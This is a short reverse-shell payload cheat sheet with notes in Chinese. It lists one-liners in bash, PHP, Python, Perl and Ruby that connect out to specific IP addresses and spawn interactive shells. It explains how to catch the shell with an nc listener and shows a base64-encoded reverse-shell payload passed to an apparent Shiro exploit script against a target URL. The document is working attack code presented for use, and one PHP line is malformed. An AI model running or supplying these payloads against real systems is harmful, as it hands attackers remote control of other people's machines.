bash -i >& /dev/tcp/10.0.10.124/23008 0>&1
php -r '$sock=fsockopen("150.158.104.227",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.158.104.227",9997));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"150.158.104.227:9996");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("150.158.104.227","9996");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
exec 5<>/dev/tcp/150.158.104.227/9996
php- 'exec("/bin/bash -i >& /dev/tcp/150.158.104.227/9994")'
另外一边用nc去监听端口:`nc -lvvp 23008`
如果要想制作反弹shell的payload,有时需要将其转换成base64编码,然后执行exp,例如:
python2 shiro.py http://10.0.10.179:8080/ "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjEwLjEyNC8yMzAxMCAwPiYx}|{base64,-d}|{bash,-i}"